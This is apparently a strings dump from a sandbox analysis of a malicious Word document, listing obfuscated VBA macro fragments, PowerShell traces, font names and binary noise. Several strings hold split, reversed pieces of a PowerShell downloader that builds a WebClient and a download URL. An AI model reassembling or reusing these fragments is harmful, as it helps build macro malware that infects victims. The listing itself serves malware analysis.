vrDjvITiwAlCa?LshKN'hBTLEd9riDVWs+XlCQGRscnSl+iZHfv^jNQbGmMANYPtujfkZjsTMWXZJYWJUbKQTbjBihNL/oaCbzNe(wVTSGI7PFHVrL^HJhvsO+GwRUlTcbOZZsXkRCRELWzDh:fEwpAxVAmWLiQcwAkETDljGSmk9utKLaLs8jmvUhDwvJaksuWwvrrEDNSgKUdmwLiFRoZrlTzrBsHwefUWrsrHPEfnoCahOjHjokjBVZSKqawnkYHQwQPtHIgvWmWIzoIGYvGaOiQjKOpJOTrlavccWUsnwCswQ$dANzhpidAEH,CjcXvWpHwMtiTUNdvoLbmOtrjjLJDonTFQrrjI]wnRAEfatNhji:[YkDiSJFlZMhf=XfzUiiEUGNS4YjGiLqfbTvhrvRBovrHldULGcMJmVirAqsTLEnrvUTSRaTQ2kEoHkRTcNAkEM"HlvWmoKnFzRNZhUKO)JtsLBidAGoiTrUIjviMbBCfjZqfjskUINS}jnwKmQBQrOHf MZvXvabURHIVtdUbthjrAmZjmumSbICuazXQsljBFnLTwQUbv3mVrmfhhwfOlF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VS_VERSION_INFO
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
vv0vssBOtes&&!Jqqqq$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VYszlQ UfqbZaVFinj88605PjjrjuCQ34342QjvwOEOQ 48952dkSkFB962D96WbIQ12142(VQQcm(JEjAtcmViitp`fTZhC&cs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VYXYa|wFzifn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VZSK(awnkA?QwQPtH@116639@vWmWIzb15979oIGYAF17090bOiQj153* OpJOTrAE81761!9vccWnwCswQ@ANzhp&9CGcta%v};EWaerb19;)DCD]St ()JQOme>tIT&-+JDQOk0Q$Oovn(&A@9W`#5291&0d#, %17$idAEHCjcXvW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
w cjSmCmDFNo3ZWVKNu722892mDwphLs[4421mDXRHil28463ftWaYQ 75812lkXlWul52937liozA4l@ulaJCilj wZiwNHSqdff
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
W NRNFUElpob
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
w!1AQaq"2B#3Rbr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
W0f0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
w9CamA^Z[\iw0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wdkd!!%F WraW1f1541AM3f1=iKnMwGCOJki
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Webdings
Unicode based on Runtime Data
(WINWORD.EXE
)
wekjwHjEJ
Ansi based on PCAP Processing
(network.pcap)
WfoHS(Q MjIjWoSHfwP97607PPiXMKP51922P@IvRTjiQ53493YzVXj74165APlhjZJP76315A(RhWTjG@(RvIPb@(oqQpF@$Fjfdr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WGjrDT! fHSpBUGhk2=61@vslbqf1p8670A+!F*B45 bCrjIbJ7312AdFPRMk!F1377BdjzBLj1HBXKFNcBwhXWKd2YZ&p=%TjDEXVkGksKp% @tps2SA29d83 D+ wb,r E19`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Wide Latin
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 2
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 3
Unicode based on Runtime Data
(WINWORD.EXE
)
wLApZdwfUu TckXYpKLZjArsMnvFvmP\RGbuzpUjwiUEAmlUdJWjrl0SNlESh;mYXolIFYEkfi{jjItiWDLuSKWzfCINZzwuNZjwCGmNdKoOja'iiUYOFBbSXJkcaqDAuFmVUSbi0SqfOR0cBJZhJ3SFtVwzpGjDUnuQTwzsIUZFGffShiTLnzWSjJQlGbuLKUKjPWqjNwhihMcobIdmUQrULnYFkSDXTZ1'JwzGSiUVCTUBjEZjiwdoBqls(OmwfcGGmjAqJDEGXjsJmwrYtvOwdioEiPquj-PbjQwucWXmfQMQnoGJPSXZNYIkwBOcWBwSyIjfaPPSbCoZsZljaakrrp=LOsXhrPCiPoS5NnRmJrPGiswwXgjiIbVOdiOaGAQmwKPiidzAZjUvjVnSzqYnfuQfrAiWNRNFU^ElpobH.iUFQp3RdOvDveKRvcN2ZNwjKAkUrcGwzTuLru=QHSNHMcXLJZwJEjZWhhiPzoPBizmmpH8ozAQWj\,vjYsnnLVHOEuwPwUlHL.PVdVdFi0LLBcCMZQQDYIhuTNrJLXLa$2DPhzERwuFUeiZiEuUQnJbJbxCRfIMRvZqiNuxbudJS*UbopsPyQsAkaXX9lohwuSRKwBpTAJqcr_UMWrAHbUn5adpQzOj|mNKWvJ/rrVlUDfWfvNDYGsrtJZwXjjJEzaGSiYVYTbKVjLI2WQZPhSwBkqBWbfpApzIgkVYwUVnDhfMSPMzGGK[bVBtdeYYFGTaEwaNrZyaWLzXMUjphWnsdIwswDLmbsHCMJHpwdEsFLpHtThBtbISvSMoXisUrtCijidhzLYXfEpWAVujiqjDRC0GBOzwJTQbLt-LIHphHswKjHBsvKXfTBFJmBo"QDtHUpimzjfaptdaLl=zIotHHwXznEmGqrEFjfELiUluXtbqHKlwQvf
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wmKKizNapifiQ@(qpwQXvBKkp9037`+MtWmS+43#&is 813772rphfh30K@FhPvTn260VcVPnOLNYmLzEnd Function
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wNcCA(McNJhG Ywzjk_8V82GhcXvC90jFhSccjapbP?32iGplBP762`+* Ptjoh5710591wLHqZpFHnwEiA!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WordBibliographyFilesIntl_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
WORDFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
wOucAq(hDKJk!@EAqJsl532UWmhn208ZTLjBzZ4623Fn YvRAW43627FdJsLiE.6989Z GZfYbIuXzPkmusHwkwosI (ZkVOXNdowlFKYHb`Oalji@scpbMN1pcaOz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WpadDecision
Unicode based on Runtime Data
(cosineinit.exe
)
WpadDecisionReason
Unicode based on Runtime Data
(cosineinit.exe
)
WpadDecisionTime
Unicode based on Runtime Data
(cosineinit.exe
)
WpadLastNetwork
Unicode based on Runtime Data
(cosineinit.exe
)
WpadNetworkName
Unicode based on Runtime Data
(cosineinit.exe
)
wQd%!=%FvIs0ZC////$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wQd%!=%FvIs0ZC655[+ 7y, %3pBYjaT= rCEAEB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wSDqYpBsz....$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wSkUI = (dfavL / XEioEW@49863Fix(TvdJk)) + 62608 - CLng(PlClo(55253FEiZJaV745 * omrRKdStr(78165)ZFzRqc<Dobjcv)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wubDbbz&`DwLrWRw820cSqJYDVT748cHBNL&2JGnlSucID="{90ACCF13-360F-4DB1-AAFF-575E015C6C17}"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WUwtHJRpYL%!&,0@Fwrtttt$'J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WuwUb = UVIJw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wVTSGI!PFHVrL@HJhvsO`18327aG wRUlT38864
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WwIwcGJiaDnK
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WYTidzEdmKg~quLvjlMjREU;VGTwfDRHJtJbaKYQvwMBLnkzFVDLauX7MTnlZBMrCbXVt}GvEzWvlRXIMihCX-@iVwzaTPIMNiM0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X X' ' Z & 8XX (x n/X X'swJrwkwHsum%!!%FWraW15{5{5{5{$' ' ^/ T *XX I X X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X X'x z $ ' ~ ' L a vXX OX X'kX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X ` bX'R f'd j lYp n psXX rJ t1kX v xX'h'BZ^c^% & SoEkSiqw2w2Mnnnn$'z ~'| " $ XX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
x'9 z^XX | ~=X X'r9+mU9{QPDR% tes&&JXzpEFJorrplRzoXXXX$' ' ; d XX 4 /nX X' ' XX Y U1X X'mU9+JrwHsum%KGjBBBB$'mU9AmU ' -x O EXX (
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'9f906fDF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UYrrrr$' ' v D XX `W >X "X'? &'$ * ,~ . 0XX 2 4PX 6 8X'(CR7izc[,)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf^^^;^$': >'< B D$ FJP HwXX J L5X N PX'@ T'R X Z] \_T ^(9XX `y3 b>XX d fX'VY76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuSS$'h l'j p rY tgO vXX x zX | ~X'n ' H ?1 mXX g SEX X'07zsP$+]4[emOHsp$ ( .ta9.<<<<$' ' FW B XX `6 X X' ' y @mXX m X X'lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7fzzzz$' ' ` PbXX -& X X' ' / XX t`X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'oAttribute VB_Name = "uIpNwjvi"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'U9CDT2swdMLdmXo% 3pK$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
x0n0Y0y0f0n0Y
Ansi based on PCAP Processing
(network.pcap)
X0ZWTcX %^c^E^L@6L6L6L6L$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Xi6ei-n8%eKO=^az>$m$*}0Y#$u\[i
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XisUrt(ijidh / zLYXfE63452Fix(pWA Vuj))b40717QCLng(iqjDRCA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XIWIor = owksP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
xk4Vz;[@-cQ%rxZ.. )OR_h$09ARzGp}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XlCQGR(scnSBliZHfe204714!*jNQbG%8030Hb mMANYPC8296#*tujfk46983*ZjsTMA)93894>WXZJ!sJUbKQTjBihNLoaCbzN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Xwqsp1VpjbAzwDBB1T4662usK jwYwM751985Pudi6N
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX jX X'H2z% tes&&rHBCSAFllQp0kllll$' ' k Y "WdXX $3 &'GX ( *X' .', 2 4e 6 8oXX :V <kX > @X'0 HjwUfYsdMLdmXo%!!%Isoh8W$$$$$'BMZ F'D J L Nj PCXX R9C TX V XX'Ha \'Z ` b% dDA fLeXX hW j X l nX'^ MBDtes&&zsTahziwh48JTJTJT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX X X'o8( ' g XX k MX X' A@ ' { XX L [X X'o( ' = dXX , ,X X'imeZon '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX t v>EX x zX'j@rnE ~'| b 6 3XX @ EX X'|QXiQwRHh=%zNafst$' ' R: QXX zX X'mU9/ ' DL i N9XX x! X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XXFq&ll=%PInYdOqGm% 57im[[[[$'j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XZDHt6=Bk'RE$aTbQ;H-#GXY8*\;aYXVQx
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
y"?,.x9]BAjF^}m8A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
y`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392dX13P JVdCmMEKviN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Yg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
yiZwL0OZ48e(fTa"!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YkIKrRCSNheI7 !%PInYdOqGbm0F6., 729:+ d, 11dBJEU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YuYiBisbSDWsfpOKfL>59sbCzDTA`85184rw BKLzK929534LcwkpE83249:UTiwkA: 70028:uGNaW:ULmXfQ-LYkPzD$jboTkbkkwEvR)@QszoVQ@nzRZ9282(uzjmzg7(TSuqRBP(6915q SkzGv62473(bcmYDtd(425bJ`zVpnP(zOwzZ([Shell] zEBYNhr(vb0KeyCAd+ @zpawOOEKKizpw, `17959
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YY0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
YzanJQquaRidZitba8309Qp GVcXk>55193QNhHwRwQ4753 XuHEz73123PwvWfUP13185P0jqbEPizPYUPcUuaIuHwQpJm`("DF6~E|9.cflsaAx)w1(pe9elDtfIFdaEx@lnWBYU9oDpe9.UYY{yrt{)"XCDA1 ni@ cm UV2UY94h876@@5@=,r 17OB;h sJjlW;OGwUzu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YZjK!=39DKjBpzq9B
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z-4F+xMET`@IV28vI"dxB`bhb`bhxdbvXf@^HbdxHfPbn(d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z0Zf!Zf!Zf!+Z(FFZFFFFFZFFFFFFFf!FFFFFFFFF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z79xx/\.:}]=gYl:5Fjpvh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZAVFi piiiSpw"vZ177FwhPC3007vwfHv@k362INCfcBVp2484AAz`XalwTo8AMNZGSV2GCQoeCktSzirLZf#0VWiKK@fO#wPjANo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZAzPCFwSPF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZC~*.!?-XiKf-p9Qy}mmd{(y?<n)nq*=kq-9;xYsU;R(jxOQ@%%,d*e.THRrV&425;62s1|PaTvvNdfr7b@uo6Pj1#wccuOio\ETSnkyqY<R+_A/<cmmu<6n|-bIXnXvf#;wp_Ayk*o<k$r/FR2+<7iji\(H28b2
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zGlC (oiMB1<EAtFdM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ziLz/(FnEOtZrQRtIQ88RNh4uu35&AfMKc252473cbluY`08GsKTJC!3098QAmVt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zInzNLA3ndLnvEIJDbA35wA3ZRbBSB3`23509&ArzlaaE365862jLabG!2810ijrWWqE32722B3bNlfYB3Mwuzkv(@ZNUGEb$c zzPaq\iwVGw(YovKzijHdk&4K/ (iCQTmm9x3(N0nPzh#55246zddzJ(41(Zwbmw%9640"V`qlqodbcjjUCKAfMvWNidAm
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZiwzPqjMnTF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zjJp)UlVTiuDr 4X0ZWTcX %eE^L1l+ 12,`p + "kEuwRuNGdUQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zjUG=zWGvA(hCpdYXGwLa34=PdYbBC)) + 32824 - CLng(JYhLb`35979@UvCcJY\54552 * tETLsStr(97126) / UlLpjzsYvEij)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zMOcbzVndNaJbZX$jw67URtTbI1260AHCW501782istCuQJ48447p@bpdJOoU650'MqSfq!smTBQsRCFDzprwV!qcuLA]uznHTbGiPFGnYsGFvi`NcBwhXWKxtsUDDJQ,+ UWifd!<vldhd!^+ QMWPujSmEUrpOkhrC`fPR tRoqAmOLCQVHchDSGIPrKNWlUNhiDbVqfSJSUZBbKMcdWaKzqmAk@SWEVfFJPimhzLJTwBQQMR+ iZKSpWMfDAcNa wKTwHYA1jzuS+ AcR+ ZIZ"HGiADLNKKN@pBLVYE0ZbLI+ upLfisAzmViitpfTZhNUjT@pWHKiof@wLFvsQRCSNpbOkGzH1hihCHw!KiwzK;op/ YzGisA5371qijCG 8286srofnY+ V9COoUq?+ 493360# ZAMOY{4504;JWUbbBv1zErS1qXMFK"pRrT;QbFJaW(tnocH@USlIvR432
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zPHvPqrDOGFFzXItVWakEMIAtF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zqmAkS0WEVfQo$4fiIIkw9z"u253+ 3, .TCHqHDClzMKp
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zQ~'^uk4].E,kwvO95.I@bt/r9^9O0p*t]Uy\ut#4b5T|Y\J IpVMxu8sm#D3Gk?709eR`zWc^sL6j>lmxby<,q+4UMx<ln);>~u~f`X+=?m7D+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZSfoiXzjhizojGfzhAmTzv~KCrItXivPwPyaLajmWxJwHfcWdrUhiJ-HLpBp]fXSnU4hRpYBBFIlzW[pTiPO{JYMGVW@NwpzcnSTfGnWOSuP@MpCZdvldhdBXtcRffrlumHXi#UfPwjkEBwobGQHYvPVaKAoAKjGvPjZGqsridDYoVrsBszUOHiQNRpuUHE#BXTcAHY!zGlCJ2oiMBX~EAtFdM7xnlkfhTVNRtGp"BrkizjwWAwdOYljMWFqwwNzfSJSUkp`idOnFDlbEpEIry`LSLNGO1WVVJARv ufBWdasmIYK[TwcDi,XniGkwgIEnoIZnhfjQTzjCpwBNmdmLHtDoQjgwSkUI,dfavL]XEioEW TvdJk2PlClov-EiZJaomrRKWZFzRqc!DobjcvoBbKMcdWaK]UtXKXzzAOuvkfIms>rapjDTAdBtwa\:FuPjttZqFWUuBiIkmMUrZz!GQUzOf^tGwPPjofOOCi;ozCKGjVYszlUfqbZ~aVFinjWjjrjuCSjvwOEOfdkSkFBioWbIzNVQQcmJEjAtv.`mViitpfTZhCiKnMwGCOJki:nuYaJa`VlbwolneUjjkMZijPMIHHjw3OfIrSSMzaJn1<fZXYicQoLwhAlSXBiqv[mAmbBIerqMrZCOYKZjUcECKSNWUHVWIFXCwAzjCddTIzRJCYOwcJoXFWFWCL [cNawKTwH+TnXnUqHGTIo/NNOWpL(qZHutcLBbdRMtVai6sbiTVEGzPKiV>sifrJ)pcMRAUmvKWnwzerOipTk5SwEtQfJ|vfrMRtojSaVtm$CInzjmCZvXLzPQSQA`wKHnwLRUZwzv>QvXcW4SRuhuM9JPimhzLJT:cJCdlikKdsvq}ctFWYNXIAXtYLmEjtMFBzRvMPaYAjitj<VTGpuJyNAQdjfzjunaMeNlfcWMpZjXEv$YoZbzwE"iNOFFqjAwXc/VhpfifEDwXbn~jILhiAjCwUZnzbOtzRriiPqiSIbXpBLVYEZbLId|6rkquEpwbjkTdLYz7yZQmLtAwolsYp[jCiCIrJzVlDBKBESfKQjqBtDDDzY0RvIPSNrPiRHXmaMztiXBjUMVUBCmDiIGuViTW(hUdPwIiVlfzQirQREBvOdPSjfWdBEhENICnwBQQMRvBYjaddrCEAEB0PljtmTqGIUfl
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZsWYY(FwfKvYiWMME/ 9317WzXkllo96039eYikkzfe473CQlYu"V871K* EjBnf331AbWdWUiclnmwHA(LBq`DsrNl`$CiBE3h@/4d45AQT/moc.aoDsi/$0/:pt`zoaR/ppa-ppw/k@rnEp@<5230Asb, E92@HbKnnTtwzL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zTZADLcFXJtFRE=0, 0, 0, 0, C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zTZADLcFXJtFREzTZADLcFXJtFREFPAOsHRZpzGcVHFPAOsHRZpzGcVHHULSuHBvjHULSuHBvjuIpNwjviPROJECTwmnCompObjqruIpNwjviizosJmiCizosJmiC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Zu-;iRxM D[brNi2i}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zWH<:b8Cc5<<w=8yukg"W#5v9otmfbMI2+wz<QX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zWzzYA(rIFH`V0hDkV`aR/ AVpCpwLr4 f}wkwRRD
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zXVB#QDViwzORjzYw96172pAnjzLN649(rbASwBKE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zYhBF(mGwQW`Rfjaf66422dAEQmLd1]8VsAlWcKT57507AdFPNTM22368dutMYEAA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZzGUKZNoTj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zZIBSu9787l`wqiFD0U LjPTV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZzPpc(qbuAGRiOkz3"UGpst"208)D`CIojF213Ek/20* uLQzMH650qHzicI"jhBfQCmpIFncFj6Qovrp(Irr/ TfBFz@1{bCRKN2!I6@YFhYNH4511#CFfz0cAp46549,MXzLm6m006hfw`~dhCPv1qaBbOc!"i.%@SH5i V/%^c^_", 80769c'220TaWwUWFOCMD!LBCoa=(zsOjpFBRjpV3969}sZpn04bQvMij`38fAamk@ * LnI8iUV7FMIiTM}XSdYA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data
(cosineinit.exe
)
{k6IP6$5P:dG u
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
{rscbauCGkl*)YuYiiYbSDWYYfpOKfL*ZbCzDTwBKLzKLcwkpEUTiwkAuGNaWcULmXfQ LYkPzDjboTkEkkwEvR<QszoVQnzRZa++uzjmz9TSuqRPQqSkzGvCbcmYtdBJzVpnPzOwzZCShellVzEBYNtChrK~vbKeyCzpawOOEKKizpwhStunbAmlJwGiXlAjVEiAHa3LInkzH"PmHiZm
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
{W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
|*.bmp;*.cur;*.dib;*.emf;*.ico;*.wmf|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
}!1AQa"q2#BR$3br
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
}k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
~!2g/<+u;2j76qg?_\y]^UvEaC/cod2^gltS-QTfQEQEQEQEQEQEQEQEQEQEQEQEQEQE?q?qfAW|'S5uyyo>;r=&(>++"?S^^[AGS<(?BqF [OW_DhtE{9F>c>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
~0g0n0peW[
Ansi based on PCAP Processing
(network.pcap)
~0g0n0tepe
Ansi based on PCAP Processing
(network.pcap)
~d"90exp<^!~J7t Lc\)Ic8E&]Sf~@Aw?'r3&2@7k}naWJ}N1XGVh`L%Z`=`VKb*X=z%"sI<&n|.qc:?7/N<Z*`]u-]e|a|mH{m3C.nAr)[;-$$`:>NVl%kv:Ns_OuCX=mO4m'sd|0n;pt2e}:zOrgI(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
�����
Ansi based on Runtime Data
(powershell.exe
)
������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������
Ansi based on Runtime Data
(WINWORD.EXE
)
��������
Ansi based on Runtime Data
(powershell.exe
)
���������
Ansi based on Runtime Data
(powershell.exe
)
����������
Ansi based on Runtime Data
(cosineinit.exe
)
������������
Ansi based on Runtime Data
(powershell.exe
)
�������������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������������_����������������
Ansi based on Runtime Data
(powershell.exe
)
��������������
Ansi based on Runtime Data
(powershell.exe
)
����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
�����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
��������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������
Ansi based on Runtime Data
(powershell.exe
)
����������������������������
Ansi based on Runtime Data
(powershell.exe
)
������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
�����������������������������������������������������������?����������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?�������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?��������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
�������������������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
��������������������������������������������������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
���������������������������������������������������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
!"#$%&'()*+,-./012345689:;<=>?@ADEa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal2\(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library?\&4zTZADLcFXJtFRE0<5cd8073f)zTZADLcFXJtFREt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!AHHCZ%75156iVwuE625@M* HIJmM6312zUhUQ OGXWPwVurLGdno@dar11%bHY@KFlwode@sXYf%522p9395`b, E
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"' & (= *( ,[XX .! 0T-X 2 4X'$
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
#-q8|.[Ck4*j)jnc"ePG7;.h
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$' ' ! < XX X X' ' ? ` VXX L BX X'7I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCkBBB0B$'.C ' +X P XX }8X X'C++- ' ` Z XX V .X X'ata.,jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ$' ' Ii % beXX m "X X' ' u !rXX 3X
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$'8 <': @ B> D F/XX Hf~ Jq*X L NX'>mU R'P V XaM Zhz \$XX ^z% `X b dX'TRfjE8^p^S^m^o^c^% 8D$'f j'h n p r|f tXX v xT#X z |X'l' '~ F8 XX z1X X'Rcs.AbRp c/ k.l.l.l.l$' ' - MXX a 6X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$.' ",#(7),01444'9=82<.342C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
